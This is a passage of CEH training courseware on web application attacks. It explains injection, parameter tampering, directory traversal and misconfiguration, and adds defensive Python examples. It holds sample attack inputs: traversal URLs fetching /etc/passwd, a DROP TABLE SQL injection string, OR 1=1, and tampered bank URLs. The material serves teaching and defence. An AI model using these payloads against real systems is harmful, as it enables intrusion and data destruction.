Module 13
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Security News
69%, from 603,016 separate attacks in Q2 to 1,018,817 in Q3. CSRF attacks reached second place on the Superfecta at 843,517. Cross-site attacks depend on the trust developed between site and user. XSS attacks involve a web application gathering malicious data from a user via a trusted site (often in the form of a hyperlink containing malicious content), whereas CSRF attacks exploit the trust that a site has for a particular user instead. These exploits can also be used to steal sensitive information such as user names, passwords and credit card details, without the site's or user's knowledge. The severity of these attacks depends on the sensitivity of the data handled by the vulnerable site, which ranges from personal data found on social networking sites to the financial and confidential details entered on ecommerce sites, amongst others. A great number of organisations have fallen victim to such attacks in recent years, including PayPal, Hotmail and eBay, the latter falling victim to a single CSRF attack in 2008 which targeted 18 million users of its Korean website. Furthermore, in September this year, IT giants Microsoft and Google Chrome both ran extensive patches targeted at securing XSS flaws, highlighting the prevalence of this growing online threat.

"Cross-site attacks are a severe threat to business operations, especially if servers aren't properly prepared," said Chris Hinkley, CISSP, a Senior Security Engineer at FireHost. "It's vital that any site dealing with confidential or private user data takes the necessary precautions to ensure applications remain protected. Locating and fixing any website vulnerabilities and flaws is a key step in ensuring your business and your customers don't fall victim to an attack of this nature, the consequences of which can be significant, in terms of both financial and reputational damage."

The Superfecta attack traffic for Q3 2012 can be broken down as follows: as with Q2 2012, the majority of attacks FireHost blocked during the third calendar quarter of 2012 originated in the United States (11 million / 74%). There has, however, been a great shift in the number of attacks originating from Europe this quarter, as 17% of all malicious attack traffic seen by FireHost came from this region. Europe overtook Southern Asia (which was responsible for 6%) to become the second most likely origin of malicious traffic. Varied trends among the Superfecta attack techniques are demonstrated between this quarter and last. During the build-up to the holiday season, ecommerce activity ramps up dramatically, and cyber-attacks that target website users' confidential data are also likely to increase as a result. As well as cross-site attacks, the other Superfecta attack types, SQL Injection and Directory Traversal, still remain a significant threat despite a slight reduction in frequency this quarter. Ecommerce businesses need to be aware of the risks that this period may present to their security, as Todd Gleason, Director of Technology at FireHost, explains: "You'd better believe that hackers will try and take advantage of any surges in holiday shopping. They will be devising a number of ways they can take advantage of any web application vulnerabilities and will use an assortment of different attack types and techniques to do so. When it's a matter of confidential data at risk, including customers' financial information - credit card and debit card details - there's no room for complacency. These organisations need to know that there's an increased likelihood of attack during this time and it's their responsibility to take the necessary steps to stop such attacks."
Module Objectives

- How Web Applications Work
- Web Attack Vectors
- Web Application Threats
- Web App Hacking Methodology
- Footprint Web Infrastructure
- Hacking Web Servers
- Analyze Web Applications
- Attack Authentication Mechanism
- Attack Authorization Schemes
- Session Management Attack
- Attack Data Connectivity
- Attack Web App Client
- Attack Web Services
- Web Application Hacking Tools
- Countermeasures
- Web Application Security Tools
- Web Application Firewall
- Web Application Pen Testing
The main objective of this module is to show the various kinds of vulnerabilities that can be discovered in web applications. The attacks exploiting these vulnerabilities are also highlighted. The module starts with a detailed description of web applications. Various web application threats are mentioned. The hacking methodology reveals the various steps involved in a planned attack. The various tools that attackers use are discussed to explain the way they exploit vulnerabilities in web applications. The countermeasures that can be taken to thwart such attacks are also highlighted. Security tools that help network administrators monitor and manage web applications are described. Finally, web application pen testing is discussed. This module familiarizes you with the objectives listed above.
Module Flow
Web applications are application programs that are accessed over an Internet connection. These applications use HTTP as their primary communication protocol. Attackers target these apps for several reasons, and they are exposed to various attacks. For a clear understanding of "hacking web applications", we divide the concept into the following sections:

- Web App Concepts
- Web App Threats
- Hacking Methodology
- Web Application Hacking Tools
- Countermeasures
- Security Tools
- Web App Pen Testing

Let us begin with the Web App concepts.
This section introduces you to web applications and their components, explains how a web application works, and describes its architecture. It provides insight into Web 2.0 applications, vulnerability stacks, and web attack vectors.
[Chart: WhiteHat Security 2012 statistics, percentage of web applications affected by each vulnerability class: Cross-Site Scripting (55%), Information Leakage, Content Spoofing, Insufficient Authorization, Cross-Site Request Forgery, Brute Force, Predictable Resource Location, SQL Injection, Session Fixation, Insufficient Session Expiration (10%)]
According to the WhiteHat Security website statistics report of 2012, cross-site scripting vulnerabilities are found on more web applications than any other vulnerability class. From the graph you can observe that in 2012, cross-site scripting vulnerabilities were the most common, found in 55% of web applications. Only 10% of web applications are affected by insufficient session expiration vulnerabilities. In order to minimize the risks associated with cross-site scripting vulnerabilities in web applications, you have to adopt the necessary countermeasures against them.
- Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc.
- Web applications and Web 2.0 technologies are invariably used to support critical business functions such as CRM, SCM, etc. and improve business efficiency
- New web technologies such as Web 2.0 provide more attack surface for web application exploitation
the requests for resources are treated as separate and unique. Thus, the integrity of a link is not maintained with the client. Cookies can be used as tokens, which servers hand over to clients to allow access to websites. However, cookies are not perfect from a security point of view, because they can be copied and stored on the client's local hard disk so that users do not have to request a token for each query. Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc. Organizations rely on web applications and Web 2.0 technologies to support key business processes and improve performance. New web technologies such as Web 2.0 provide more attack surface for web application exploitation. Attackers discover different types of vulnerabilities in web applications and exploit them to compromise those applications. Attackers also use tools to launch attacks on web applications.
Web Application Components
The components of web applications are listed as follows:

Login: Most websites allow authenticated users to access the application by means of a login, meaning that to access the service or content offered by the web application, the user needs to submit his/her username and password. Example: gmail.com.

The Web Server: Either software or hardware intended to deliver web content that can be accessed through the Internet. An example is the web pages served to the web browser by the web server.

Session Tracking Mechanism: Each web application has a session tracking mechanism. The session can be tracked by using cookies, URL rewriting, or Secure Sockets Layer (SSL) information.

User Permissions: When you are logged in but your user permissions do not allow access to the requested web page, you may be redirected to the login page or to another page.

The Application Content: An interactive program that accepts web requests from clients and uses the parameters sent by the web browser to carry out certain functions.

Data Access: Usually the web pages communicate with each other via a data access library in which all the database details are stored.

The Data Store: A store for the important data that is shared and synchronized between the child processes/threads. This stored information is quite important and necessary for higher levels of the application framework. It is not mandatory that the data store and the web server are on the same network; they can be in contact or accessible to each other through the network connection.

Role-level System Security

Application Logic: Usually web applications are divided into tiers, of which the application logic is the middle tier. It receives the request from the web browser and services it accordingly. The services offered by the application logic include querying and updating the database as well as generating a user interface.

Logout: An individual can shut down or log out of the web application or browser so that the session and the application associated with it end. The application ends either on the initiative of the application logic or automatically when the servlet session times out.
[Figure: a browser requests news item ID 6329 (Topic: Tech, Source: CNN); the web application turns it into the query SELECT * from news where id = 6329 and returns the output to the browser]
How Web Applications Work
Whenever someone clicks a link or types in the browser, the requested website or content is immediately displayed on the screen of the computer, but what is the mechanism behind this? This is the step-by-step process that takes place once a user sends a request for particular content or a website, where multiple computers are involved. The web application model is explained in three layers. The first layer deals with the user input through a web browser or user interface. The second layer contains JSP (Java Server Pages) or ASP (Active Server Pages), the dynamic content generation technologies, and the last layer contains the database for storing customer data such as user names and passwords, credit card details, etc. or other related information.

Let's see how the user triggers the initial request through the browser to the web application server:

1. First the user types the website name or URL in the browser and the request is sent to the web server.
2. On receiving the request, the web server checks the file extension:
   - If the user requests a simple web page with an HTM or HTML extension, the web server processes the request and sends the file to the user's browser.
   - If the user requests a web page with the extension CFM, CFML, or CFC, the request must be processed by the web application server, so the web server passes the user's request to it.
3. The user's request is now processed by the web application server. In order to process the user's request, the web application server accesses the database placed at the third layer to perform the requested task by updating or retrieving the information stored in the database.
4. Once done processing the request, the web application server sends the results to the web server, which in turn sends the results to the user's browser.
[Figure: request path from the User's browser (Login Form) over the Internet, through the Firewall, to the Web Server]
[Figure: web application architecture. Clients: web browser, smart phones, web appliances, external web services. Presentation layer: web server with firewall, HTTP request parser, servlet container, and resource handler. Business layer: application server (J2EE, XCode, .NET, C++, COM, COM+) holding the business logic, plus authentication and login. Database layer: database server and cloud services.]
Web 2.0 refers to a new generation of web applications that provide an infrastructure for more dynamic user participation, social interaction, and collaboration.

Examples of Web 2.0 technologies:

- RSS-generated syndication
- Flash-rich interface websites
- Mobile applications (iPhone)
- New technologies like AJAX (Gmail, YouTube)
- Blogs (WordPress)
Vulnerability Stack

- Custom Web Applications: Business Logic Flaws, Technical Vulnerabilities
- Third-party Components: Open Source / Commercial
- Database
- Web Server
- Operating System: Windows / Linux / OSX
- Network: Router / Switch
- Security: IPS / IDS
Web applications are maintained and accessed through various levels that include custom web applications, third-party components, databases, web servers, operating systems, networks, and security. All the mechanisms or services employed at each level help the user in one way or another to access the web application securely. When talking about web applications, security is a critical component to be considered, because web applications are a major point of entry for attacks. The vulnerability stack above shows the levels and the corresponding element/mechanism/service employed at each level that can make web applications vulnerable.
Web Attack Vectors

- Attack vectors include parameter manipulation, XML poisoning, client validation, server misconfiguration, web service routing issues, and cross-site scripting
- Security controls need to be updated continuously as the attack vectors keep changing with respect to a target of attack
An attack vector is a method of entering unauthorized systems to perform malicious attacks. Once the attacker gains access to the system or the network, he or she delivers an attack payload or causes a malicious outcome. No protection method is completely attack-proof, as attack vectors keep changing and evolving with new technological changes. Examples of various types of attack vectors:

Parameter manipulation: The attacker provides crafted input values to web services and gains control over the SQL, LDAP, XPATH, and shell commands built from them. When such values are passed through to the web services, the web applications running on top of those web services become vulnerable and are easily attacked.

XML poisoning: Attackers provide manipulated XML documents that, when parsed, can disturb the logic of the parsing method on the server. When huge XML documents are processed at the application layer, they can easily be used by the attacker to launch his or her attack and gather information.

Client validation: Client-side validation must be backed by server-side validation. AJAX routines can easily be manipulated, which in turn makes a way for attackers to perform SQL injection, LDAP injection, etc. and compromise the web application's key resources.

Server misconfiguration: The attacker exploits vulnerabilities in the web servers and tries to break the validation methods to get access to the confidential data stored on the servers.

Web service routing issues: SOAP messages are permitted to traverse different nodes on the Internet by WS-Routers. Compromised intermediate nodes can give access to the SOAP messages communicated between two endpoints.

Cross-site scripting: Whenever malicious JavaScript code is executed in the targeted browser, the browser can be exploited by the attacker to gather information.
Module Flow
Web applications are targeted by attackers for various reasons. The first issue is that the quality of the source code, as it relates to security, is poor; another is that applications often have a "complex setup." Due to these loopholes, attackers can easily launch attacks by exploiting them. Now we will discuss the threats associated with web applications.
This section lists and explains the various web application threats such as parameter/form tampering, injection attacks, cross-site scripting attacks, DoS attacks, session fixation attacks, improper error handling, etc.
Cookie Poisoning
By changing the information inside the cookie, attackers bypass the authentication process, and once they gain control over the network, they can either modify the content, use the system for a malicious attack, or steal information from the user's system.
Directory Traversal
Attackers exploit HTTP by using directory traversal and are able to access restricted directories and execute commands outside of the web server's root directory.
U n v alid ated In p u t
In order to bypass the security system, attackers tamper with the HTTP requests, URL, headers, form fields, hidden fields, query strings, etc. Users' login IDs and other related data get stored in cookies, and this becomes a source of attack for intruders. Attackers gain access to the victim's system using the information present in cookies. Examples of attacks caused by unvalidated input include SQL injection, cross-site scripting (XSS), buffer overflows, etc.
Injection Flaws
Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query.
SQL Injection
This is a type of attack where SQL commands are injected by the attacker via input data; the attacker can then tamper with the data.
Parameter/Form Tampering

This type of tampering attack is intended to manipulate the parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc. This information is actually stored in cookies, hidden form fields, or URL query strings, and is used to increase application functionality and control. Man-in-the-middle is one example of this type of attack. Attackers use tools like WebScarab and Paros Proxy for these attacks.

Denial-of-Service (DoS)

A denial-of-service attack is an attacking method intended to terminate the operations of a website or a server and make it unavailable to intended users. For instance, a website related to a bank or email service is not able to function for a few hours to a few days. This results in loss of time and money.

Cross-Site Request Forgery

The cross-site request forgery method is a kind of attack where an authenticated user is made to perform certain tasks on the web application that an attacker chooses, for example by clicking on a particular link sent through an email or chat.
Information Leakage
Information leakage can cause great losses for a company. Hence, all sources such as systems or other network resources must be protected from information leakage by employing proper content filtering mechanisms.
Improper Error Handling
It is necessary to define how the system or network should behave when an error occurs. Otherwise, it may provide a chance for the attacker to break into the system. Improper error handling may lead to DoS attacks.
Log Tampering
Logs are maintained by web applications to track usage patterns such as user login credentials, admin login credentials, etc. Attackers usually inject, delete, or tamper with web application logs so that they can perform malicious actions or hide their identities.
Buffer Overflow
A web application's buffer overflow vulnerability occurs when it fails to guard its buffer properly and allows writing beyond its maximum size.
Broken Session Management
These attacks occur when security-sensitive credentials such as passwords and other useful material are not properly taken care of. Attackers compromise the credentials through these security vulnerabilities.
Broken Account Management

Even authentication schemes that are valid are weakened by vulnerable account management functions, including account update, forgotten or lost password recovery or reset, password changes, and other similar functions.
Insecure Storage
Web applications need to store sensitive information such as passwords, credit card numbers, account records, or other authentication information somewhere, possibly in a database or on a file system. If proper security is not maintained for these storage locations, the web application may be at risk, as attackers can access the storage and misuse the information stored. Insecure storage of keys, certificates, and passwords allows the attacker to gain access to the web application as a legitimate user.
Insecure Direct Object References

When various internal implementation objects such as a file, directory, database record, or key are exposed through a reference by a developer, an insecure direct object reference occurs. For example, where a bank account number is used as a primary key, there is a good chance it can be compromised by an attacker who manipulates such references.
Insecure Cryptographic Storage
When sensitive data is stored in the database, it has to be properly encrypted using cryptography. Some encryption methods developed in-house by developers are not up to par; cryptographically strong encryption methods have to be used. At the same time, care must be taken in storing the cryptographic keys. If these keys are stored in insecure places, the attacker can obtain them easily and decrypt the sensitive data.
Authentication Hijacking
In order to identify the user, every web application uses user identification such as a user ID and password. Once the attacker compromises the system, various malicious things like theft of services, session hijacking, and user impersonation can occur.
Cookie Snooping
Attackers use cookie snooping on a victim's system to analyze their surfing habits and sell that information to other attackers, or may use this information to launch various attacks on the victim's web applications.
Web Services Attacks
Web services are process-to-process communications that have special security issues and needs. An attacker injects a malicious script into a web service and is able to disclose and modify application data.
SSL/TLS authentication should be used for authentication on websites; otherwise the attacker can monitor network traffic to steal an authenticated user's session cookie. Various threats such as account theft, phishing attacks, and admin account compromise may follow after systems are compromised.
Hidden Manipulation
These types of attacks are mostly used by attackers to compromise e-commerce websites. Attackers manipulate the hidden fields and change the data stored in them. Several online stores face this type of problem every day. Attackers can alter prices and conclude transactions with the prices of their choice.
Obfuscation Application
Attackers usually work hard at hiding their attacks to avoid detection. Network and host intrusion detection systems (IDSs) are constantly looking for signs of well-known attacks, driving attackers to seek different ways to remain undetected. The most common method of attack obfuscation involves encoding portions of the attack with Unicode, UTF-8, or URL encoding. Unicode is a method of representing letters, numbers, and special characters so that these characters can be displayed properly, regardless of the application or underlying platform in which they are used.
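As an added illustration (not part of the module text, and also covering the canonicalization step mentioned under Unvalidated Input), the Python below contrasts a weak filter that inspects the raw, still-encoded parameter with a check that canonicalizes first, using the encodings this section names: URL encoding, double URL encoding, and Unicode compatibility characters. The sample values and function names are constructed for this example.

```python
import unicodedata
from typing import Tuple
from urllib.parse import unquote

# Upper bound on decode passes; a pathological value must not keep the loop busy.
MAX_DECODE_ROUNDS = 4


def canonicalize(raw: str) -> Tuple[str, int]:
    """Reduce a request parameter to one canonical form before any check.

    Percent-decoding is repeated until the value stops changing, which is how a
    double-encoded value (%252e -> %2e -> .) is unwrapped, and NFKC normalization
    folds Unicode compatibility forms (e.g. a fullwidth solidus) onto their ASCII
    equivalents.  Returns (canonical_value, decode_rounds).
    """
    value = raw
    rounds = 0
    while rounds < MAX_DECODE_ROUNDS:
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
        rounds += 1
    return unicodedata.normalize("NFKC", value), rounds


def naive_filter_allows(raw: str) -> bool:
    """The weak check: a substring blocklist applied to the raw, still-encoded value."""
    return "../" not in raw and "..\\" not in raw


def validate_filename(raw: str) -> Tuple[bool, str]:
    """The corrected check: canonicalize first, then reject traversal sequences and
    hidden characters.  Returns (accepted, canonical_name_or_reason)."""
    canonical, rounds = canonicalize(raw)
    if rounds > 1:
        # Legitimate clients encode once; a second layer is a classic evasion sign.
        return False, "double-encoded value"
    if any(c in canonical for c in ("/", "\\", "\x00")) or ".." in canonical:
        return False, "path separator or traversal sequence after canonicalization"
    if not canonical or not canonical.isprintable():
        return False, "empty or non-printable name"
    return True, canonical


if __name__ == "__main__":
    # Constructed sample parameter values (not from the page).
    samples = [
        "report.pdf",
        "%2e%2e%2fsecret.txt",            # single URL encoding of ../
        "%252e%252e%252fsecret.txt",      # double URL encoding
        "\uff0e\uff0e\uff0fsecret.txt",   # fullwidth dots and slash
    ]
    for s in samples:
        print(f"{s!r:36} naive_allows={naive_filter_allows(s)!s:5} "
              f"strict={validate_filename(s)}")
```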
Security Management Exploits
Some attackers target security management systems, either on networks or on the application layer, in order to modify or disable security enforcement. An attacker who exploits security management can directly modify protection policies, delete existing policies, add new policies, and modify applications, system data, and resources.
Unvalidated Input

- Input validation flaws refer to a web application vulnerability where input from a client is not validated before being processed by web applications and backend servers
- An attacker exploits input validation flaws to perform cross-site scripting, buffer overflow, injection attacks, etc. that result in data theft and system malfunctioning

[Figure: a browser POST request to http://juggyboy.com/login.aspx?user=jasons&pass=springfield reaches the database through a query built by string concatenation, shown on the slide as the "Modified Query":]

    string sql = "select * from Users where user = '" + User.Text + "' and pwd='" + Password.Text + "'";
An input validation flaw refers to a web application vulnerability where input from a client is not validated before being processed by web applications and backend servers. Sites try to protect themselves from malicious input through input filtering, but there are various encoding methods that can be used to evade the filter. Many HTTP inputs have multiple formats, which makes filtering very difficult. Canonicalization reduces the encodings to a single form and is useful in avoiding such attacks. Web applications that use only a client-side mechanism for input validation can easily be bypassed by attackers. In order to bypass the security system, attackers tamper with the HTTP requests, URLs, headers, form fields, hidden fields, and query strings. Users' login IDs and other related data get stored in cookies, and this becomes a source of attack for intruders. Attackers gain access to systems by using the information present in the cookies. Various methods used by attackers are SQL injection, cross-site scripting (XSS), buffer overflows, format string attacks, cookie poisoning, and hidden field manipulation, which result in data theft and system malfunctioning.
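Added example, not from the module: the slide's concatenated login query rebuilt in Python against a constructed in-memory SQLite table, beside its parameterized form. It shows why a quote in the input changes the statement itself in the concatenated version (the slide's "Modified Query"), while the parameterized query only compares it as a value. Table contents, the sample users and the function names are constructed here.

```python
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Constructed in-memory Users table standing in for the slide's database."""
    conn = sqlite3.connect(":memory:")
    # Plaintext pwd column only to mirror the slide; real systems store password hashes.
    conn.execute("CREATE TABLE Users (user TEXT NOT NULL, pwd TEXT NOT NULL)")
    # Sample rows (constructed); the second user name legitimately contains a quote.
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [("jasons", "springfield"), ("o'neil", "hunter2")])
    conn.commit()
    return conn


def build_query_unsafe(user: str, pwd: str) -> str:
    """The slide's statement: User.Text and Password.Text spliced straight into SQL.
    Any quote in the input becomes part of the statement's structure."""
    return ("select * from Users where user = '" + user
            + "' and pwd='" + pwd + "'")


def login_unsafe(conn: sqlite3.Connection, user: str, pwd: str) -> bool:
    """Executes the concatenated statement; the database parses whatever came in."""
    return conn.execute(build_query_unsafe(user, pwd)).fetchone() is not None


def unsafe_query_parses(conn: sqlite3.Connection, user: str, pwd: str) -> bool:
    """True if the concatenated statement is still a well-formed query for this input.
    False means the input changed the SQL itself, not just a value inside it."""
    try:
        conn.execute(build_query_unsafe(user, pwd))
        return True
    except sqlite3.OperationalError:
        return False


def login_safe(conn: sqlite3.Connection, user: str, pwd: str) -> bool:
    """Hardened form: a parameterized query.  The SQL text is fixed; user and pwd are
    bound as values, so a quote in the input is only ever compared, never parsed."""
    row = conn.execute(
        "select 1 from Users where user = ? and pwd = ?", (user, pwd)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = setup_db()
    print("safe login, valid creds:     ", login_safe(db, "jasons", "springfield"))
    print("safe login, quoted user name:", login_safe(db, "o'neil", "hunter2"))
    print("concatenated query still parses for quoted name:",
          unsafe_query_parses(db, "o'neil", "hunter2"))
```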
Parameter/Form Tampering

[Figure: example URLs with client-controlled parameters: http://www.juggybank.com/cust.asp?profile=21&debit=2500, http://www.juggybank.com/stat.asp?pg=531&status=view, http://www.juggybank.com/stat.asp?pg=147&status=delete]
Parameter tampering is a simple form of attack aimed directly at the application's business logic. It takes advantage of the fact that many programmers rely on hidden or fixed fields (such as a hidden tag in a form or a parameter in a URL) as the only security measure for certain operations. To bypass this security mechanism, an attacker can change these parameters.

Detailed Description

Serving the requested files is the main function of web servers. During a web session, parameters are exchanged between the web browser and the web application in order to maintain information about the client's session, which eliminates the need to maintain a complex database on the server side. URL queries, form fields, and cookies are used to pass the parameters. Changed parameters in form fields are the best example of parameter tampering. When a user makes a selection on an HTML page, it is stored as a form field value and transferred to the web application in an HTTP request. These values may be pre-selected (combo box, check box, radio buttons, etc.), free text, or hidden. An attacker can manipulate these values. In some extreme cases, it is as simple as saving the page, editing the HTML, and reloading the page in the web browser.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Hidden fields that are invisible to the end user carry status information for the web application. For example, consider a product order form that includes the following hidden field:

<input type="hidden" name="price" value="99.90">

Combo boxes, check boxes, and radio buttons are examples of pre-selected parameters used to transfer information between different pages while allowing the user to select one of several predefined values. In a parameter tampering attack, an attacker may manipulate these values. For example, consider a form that includes the following combo box:

<FORM METHOD=POST ACTION="xferMoney.asp">
Source Account: <SELECT NAME="SrcAcc">
<OPTION VALUE="123456789">******789</OPTION>
<OPTION VALUE="868686868">******868</OPTION></SELECT>
<BR>Amount: <INPUT NAME="Amount" SIZE=20>
<BR>Destination Account: <INPUT NAME="DestAcc" SIZE=40>
<BR><INPUT TYPE=SUBMIT> <INPUT TYPE=RESET>
</FORM>

Bypassing

An attacker may bypass the need to choose between the two listed accounts by adding another account to the HTML page source code. The new option is displayed in the web browser and the attacker can select the new account; equally, the attacker can set SrcAcc to any value in an intercepting proxy without touching the HTML at all.

HTML forms submit their results using one of two methods: GET or POST. In the GET method, all form parameters and their values appear in the query string of the next URL, which the user sees. An attacker may tamper with this query string. For example, consider a web page that allows an authenticated user to select one of his or her accounts from a combo box and debit the account with a fixed unit amount. When the submit button is pressed in the web browser, the following URL is requested:

http://www.juggybank.com/cust.asp?profile=21&debit=2500

An attacker may change the URL parameters (profile and debit) in order to debit another account:

http://www.juggybank.com/cust.asp?profile=82&debit=1500

There are other URL parameters that an attacker can modify, including attribute parameters and internal modules.
Attribute parameters are parameters that characterize the behavior of the requested page. For example, consider a content-sharing web application that enables the content creator to modify content, while other users can only view it. The web server checks whether the user accessing an entry is its author (usually by cookie). An ordinary user will request the following link:

http://www.juggybank.com/stat.asp?pg=531&status=view
An attacker can change the status parameter to delete in order to delete the content, relying on the application to perform the action without re-checking authorship:

http://www.juggybank.com/stat.asp?pg=147&status=delete

Parameter/form tampering can lead to theft of services, escalation of access, session hijacking, and assuming the identity of other users, as well as to parameters that expose developer and debugging information. The common root cause is that the server trusts a client-supplied identifier or value instead of deriving it from the authenticated session and checking authorization on every request.
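The juggybank requests above, as an added example that is not part of the CEH text: cust.asp written the way the slide describes it (any profile can be debited), beside a version where the owner of a profile and the author of a page are decided by the server from the session rather than from the URL. The account numbers, page ids, owners and balances are constructed for the demonstration.

```python
# Added example, not from the CEH text: the juggybank cust.asp / stat.asp
# requests re-implemented with server-side authorization. Account numbers,
# page ids, owners and balances below are constructed for the demonstration.
from dataclasses import dataclass


class Forbidden(Exception):
    """Raised when the session owner is not allowed to act on the object."""


@dataclass
class Session:
    user: str          # identity established at login, never taken from the URL


# Constructed ownership tables: the server, not the client, knows these.
ACCOUNT_OWNERS = {21: "alice", 82: "bob"}
PAGE_AUTHORS = {531: "alice", 147: "bob"}


def fresh_state():
    """Constructed balances and pages so every run starts from the same data."""
    return {21: 5000, 82: 5000}, {531: "alice's page", 147: "bob's page"}


def debit_vulnerable(params, balances):
    """cust.asp?profile=21&debit=2500 as written: any profile can be debited."""
    profile, amount = int(params["profile"]), int(params["debit"])
    balances[profile] -= amount        # nothing checks who owns `profile`
    return balances[profile]


def debit_hardened(session, params, balances):
    """Same request, but the profile must belong to the logged-in user."""
    profile, amount = int(params["profile"]), int(params["debit"])
    if ACCOUNT_OWNERS.get(profile) != session.user:
        raise Forbidden(f"{session.user} does not own profile {profile}")
    if amount <= 0 or amount > balances[profile]:
        raise ValueError("amount must be positive and not exceed the balance")
    balances[profile] -= amount
    return balances[profile]


def stat_hardened(session, params, pages):
    """stat.asp?pg=531&status=view|delete: 'delete' requires authorship."""
    pg, status = int(params["pg"]), params["status"]
    if status == "view":
        return pages[pg]                # viewing is open to everyone
    if status == "delete":
        if PAGE_AUTHORS.get(pg) != session.user:
            raise Forbidden(f"{session.user} is not the author of page {pg}")
        return pages.pop(pg)
    raise ValueError(f"unknown status {status!r}")


if __name__ == "__main__":
    balances, pages = fresh_state()
    alice = Session("alice")
    # Tampered request profile=82 debits bob's account when alice sends it.
    print(debit_vulnerable({"profile": "82", "debit": "1500"}, balances))
    try:
        debit_hardened(alice, {"profile": "82", "debit": "1500"}, balances)
    except Forbidden as e:
        print("blocked:", e)
```

The point of the hardened functions is not input validation of the numbers (though they do that too) but that the object the request names is checked against the identity the session already established; the client may send any profile or pg it likes and gains nothing by it.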
Directory Traversal
When access is possible outside the directories an application is meant to serve, there is a risk of unintended information disclosure or modification. Complex applications consist of components and data that are typically spread across multiple directories, and the application itself traverses those directories to locate and execute its legitimate parts. A directory traversal (or forceful browsing) attack occurs when an attacker is able to browse directories and files outside the normal application access, typically by supplying path components such as ../ in a request. Such an attack exposes the directory structure of the application, and often of the underlying web server and operating system. With this level of access to the web application architecture, an attacker can:
- Enumerate the contents of files and directories
- Access pages that otherwise require authentication (and possibly payment)
- Gain secret knowledge of the application and its construction
- Discover user IDs and passwords buried in hidden files
- Locate source code and other interesting files left on the server
- View sensitive data, such as customer information
For example, the following request walks up out of the web root to retrieve a backup archive:

http://www.targetsite.com/../../../sitebackup.zip

This example obtains the /etc/passwd file from a UNIX/Linux system, which contains user account information:

http://www.targetsite.com/../../../../etc/passwd

Consider another example, where an attacker tries to access files located outside the web publishing directory using directory traversal:

http://www.juggyboy.com/process.aspx=../../../some dir/some file
http://www.juggyboy.com/.././../../some dir/some file

In practice, browsers and most web servers normalize ../ sequences in the URL path before the application sees them, so traversal sequences usually have to be sent inside a parameter value, or encoded (for example %2e%2e%2f, or double-encoded as %252e%252e%252f), to reach the vulnerable code. The pictorial representation of a directory traversal attack is shown as follows:
Figure: directory traversal attack. The attacker sends a request containing /../../etc/passwd to a PHP page that includes a theme file ($theme = 'Jason.php'); the server follows the traversal and returns the password file.
Security Misconfiguration

Easy Exploitation: Using misconfiguration vulnerabilities, attackers gain unauthorized access to default accounts, read unused pages, exploit unpatched flaws, and read or write unprotected files and directories.

Common Prevalence: Security misconfiguration can occur at any level of an application stack, including the platform, web server, application server, framework, and custom code.

Example: The application server admin console is automatically installed and not removed, and default accounts are not changed. An attacker discovers the standard admin pages on the server, logs in with the default passwords, and takes over.
Developers and network administrators should check that the entire stack is configured properly, because security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. If the server is not configured properly, the result is a range of problems that weaken the security of a website: server software flaws, unpatched security flaws, unnecessary services left enabled, and improper authentication. Some of these problems can be detected easily with automated scanners. Attackers use default accounts, unused pages, unpatched flaws, and unprotected files and directories to gain unauthorized access. Unnecessary and unsafe features should be identified and, wherever possible, disabled completely so that outsiders cannot use them for attacks, and application files must be protected by proper authentication and access control or sensitive information will leak to attackers. Examples of unnecessary features that should be disabled or changed include:
- The application server admin console is automatically installed and not removed
- Default accounts are not changed
In that situation an attacker discovers the standard admin pages on the server, logs in with the default passwords, and takes over.
Injection Flaws

Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query. Attackers exploit injection flaws by constructing malicious commands or queries that result in data loss or corruption, lack of accountability, or denial of access. Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, and can be easily discovered by application vulnerability scanners and fuzzers.

SQL Injection: the injection of malicious SQL queries through user input forms
Command Injection: the injection of malicious commands through a web application
LDAP Injection: the injection of malicious LDAP statements
Injection flaws are vulnerabilities in a web application that allow untrusted data to be interpreted and executed as part of a command or query. Attackers exploit them by constructing malicious commands or queries that result in loss or corruption of data, lack of accountability, or denial of access. Injection flaws are prevalent in legacy code and are often found in SQL, LDAP, and XPath queries; they can be detected easily by application vulnerability scanners and fuzzers. By exploiting such a flaw, an attacker can read, write, delete, and update data, whether or not it belongs to the vulnerable application. There are many types of injection flaws; some of them are as follows:
SQL injection
SQL injection is one of the most common website vulnerabilities on the Internet. It is a technique that takes advantage of non-validated input to pass SQL commands through a web application for execution by a backend database. The attacker injects malicious SQL fragments into user input fields, usually either to gain unauthorized access to the application or to retrieve information directly from the database.
Command injection

Command injection flaws are another type of web application vulnerability, and a highly dangerous one: user input reaches a command interpreter on the server, so the attacker's input is executed as a command rather than treated as data.
LDAP injection

LDAP injection is an attack method that exploits websites constructing LDAP statements from user-supplied input. When an application fails to sanitize that input, the attacker can modify the LDAP statement (for example by editing the request in a local proxy). This results in the execution of unauthorized queries, such as granting access that should be denied or altering the contents of the LDAP tree.
SQL Injection Attacks

An attacker can use a vulnerable web application to bypass normal security measures and obtain direct access to valuable data. SQL injection attacks can often be executed from the address bar, from within application fields, and through queries and searches.

Figure: the web browser sends, over the Internet, the input

test');DROP TABLE Messages;--

to the following SQL injection vulnerable server code:

<?php
function save_email($user, $message) {
    $sql = "INSERT INTO Messages ( user, message ) VALUES ( '$user', '$message' )";
    return mysql_query($sql);
}
?>

Because $user is spliced into the query text, the quote and parenthesis in the input close the INSERT statement and the remainder asks the database server to drop the Messages table. One caveat a tester should know: this payload depends on stacked queries, and PHP's mysql_query() executes only a single statement (as do most prepared-statement APIs), so against that API the stacked DROP fails. The concatenation is still exploitable with a payload that stays inside the one statement, for example by closing the first VALUES tuple and appending attacker-chosen rows.
For example, if the application appends the user-supplied ID directly to its WHERE clause, the input 2302 OR 1=1 produces:

SELECT * FROM tablename WHERE UserID= 2302 OR 1=1

